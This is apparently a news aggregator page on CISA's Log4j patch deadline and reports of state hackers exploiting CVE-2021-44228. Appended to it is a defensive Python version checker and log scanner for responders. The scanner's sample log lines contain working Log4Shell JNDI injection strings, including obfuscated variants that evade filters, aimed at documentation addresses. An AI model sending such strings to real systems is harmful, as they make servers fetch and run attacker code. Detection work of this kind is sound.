As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others
Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole.
It's interesting this is coming to light as the US government's Cybersecurity and Infrastructure Security Agency tells all federal civilian agencies to take care of CVE-2021-44228 by December 24, 2021.
Version 2.16.0 of Log4j 2.x is available; it disables JNDI access by default and removes message lookups (the `${...}` substitution inside log messages that made the bug exploitable) entirely, rather than merely turning them off as 2.15.0 did.
CISA maintains a set of resources on GitHub, including a large list of affected software and products together with the related vendor advisories, from Amazon cloud services to VMware tools.
"CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the log4j software library," CISA Director Jen Easterly said over the weekend.
CISA says it is not aware of any US federal government agencies suffering a security breach from Log4j.
News URL
https://go.theregister.com/feed/www.theregister.com/2021/12/15/log4j_latest_cisa/
Related news
- China Possibly Hacking US "Lawful Access" Backdoor
- China again claims Volt Typhoon cyber-attack crew was invented by the US to discredit it
- China's Spamouflage cranks up trolling of US Senator Rubio as election day looms
- China's Volt Typhoon reportedly breached Singtel in 'test-run' for US telecom attacks
- Reminder: China-backed crews compromised 'multiple' US telcos in 'significant cyber espionage campaign'
- T-Mobile US 'monitoring' China's 'industry-wide attack' amid fresh security breach fears
Related Vulnerability
DATE | CVE | VULNERABILITY TITLE | AFFECTED VENDORS | CWE | RISK
---|---|---|---|---|---
2021-12-10 | CVE-2021-44228 | Deserialization of Untrusted Data vulnerability in multiple products. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1): JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. Attack vector: network, low complexity. | Apache, Siemens, Intel, Debian, Fedora Project, SonicWall, NetApp, Cisco, Snow Software, Bentley, Percussion, Apple | CWE-502 | Critical (10.0)
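Two checks a responder would want alongside the CVE summary above, added here as an example (Python written for this page, not code from The Register, CISA or the Log4j project): a version-range test that encodes the affected range exactly as the table states it, and a log-line scanner that undoes the three commonest lookup-nesting tricks before matching the `${jndi:` prefix. The access-log lines are constructed for the example and use documentation IP addresses; the scanner's obfuscation coverage is deliberately partial (it resolves `lower:`, `upper:` and `:-` default values only), and the version test covers only CVE-2021-44228, the CVE listed on this page.

```python
import re

# --- Part 1: version-range check for CVE-2021-44228 -------------------------
# Range taken from the CVE text on this page: Apache Log4j2 2.0-beta9 through
# 2.15.0, excluding the backported security releases 2.12.2, 2.12.3 and 2.3.1.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", re.I)
_QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # a plain release ranks 3


def parse_version(version):
    """Turn a Log4j version string into a comparable tuple.

    '2.0-beta9' -> (2, 0, 0, 1, 9); '2.0' -> (2, 0, 0, 3, 0); '2.15.0' -> (2, 15, 0, 3, 0),
    so that 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1 < ... < 2.15.0 < 2.16.0.
    """
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch, qualifier, qnum = m.groups()
    rank = _QUALIFIER_RANK.get((qualifier or "").lower(), 3)
    return (int(major), int(minor), int(patch or 0), rank, int(qnum or 0))


_FIRST_VULNERABLE = parse_version("2.0-beta9")
_LAST_VULNERABLE = parse_version("2.15.0")
_BACKPORTED_FIXES = {parse_version(v) for v in ("2.12.2", "2.12.3", "2.3.1")}


def is_vulnerable_to_cve_2021_44228(version):
    """True if this log4j-core version falls in the affected range for CVE-2021-44228."""
    v = parse_version(version)
    if v in _BACKPORTED_FIXES:
        return False
    return _FIRST_VULNERABLE <= v <= _LAST_VULNERABLE


# --- Part 2: spotting JNDI lookup strings in logs -----------------------------
# Log4j resolves ${...} lookups from the inside out, so attackers hide the "jndi"
# prefix behind nested lookups: ${${lower:j}ndi:...}, ${${::-j}ndi:...},
# ${${env:NOPE:-j}ndi:...}. We mimic that resolution for the three cheapest
# tricks before matching; other lookups (e.g. ${date:...}) are left untouched.
_INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.I)  # Log4j lower-cases the prefix before matching


def _resolve_one(m):
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                  # this is what we are hunting; keep it intact
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                       # ${anything:-default} resolves to the default
        return body.split(":-", 1)[1]
    return m.group(0)                      # unknown lookup: leave in place


def normalize_lookups(text, max_rounds=16):
    """Collapse nested lower/upper/default-value lookups until nothing changes."""
    for _ in range(max_rounds):
        new_text = _INNERMOST_LOOKUP.sub(_resolve_one, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookups(lines):
    """Return (1-based line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if _JNDI_LOOKUP.search(normalized):
            hits.append((n, normalized))
    return hits


# Constructed sample access-log lines (documentation addresses), not real traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:13:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [10/Dec/2021:13:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:13:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:ldap://203.0.113.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:13:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}ndi:rmi://203.0.113.7:1099/a}"',
    '203.0.113.5 - - [10/Dec/2021:13:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi${env:NOPE:-:}ldap://203.0.113.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:13:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy}"',
]

if __name__ == "__main__":
    for v in ("2.0-beta8", "2.0-beta9", "2.12.1", "2.12.2", "2.14.1", "2.15.0", "2.16.0"):
        print(f"log4j-core {v:10} vulnerable to CVE-2021-44228: {is_vulnerable_to_cve_2021_44228(v)}")
    for n, normalized in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {n}: {normalized.rsplit(chr(34), 2)[-2]}")
```

The scanner reports the line after normalization, so an analyst sees `${jndi:ldap://...}` rather than the obfuscated original; the last constructed line shows why matching on `${` alone is too noisy and matching on the literal `jndi` alone is too narrow. Run it against a JAR's `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties` version string and your web or application logs; a 2.16.0 result from the version check corresponds to the fixed release the article names.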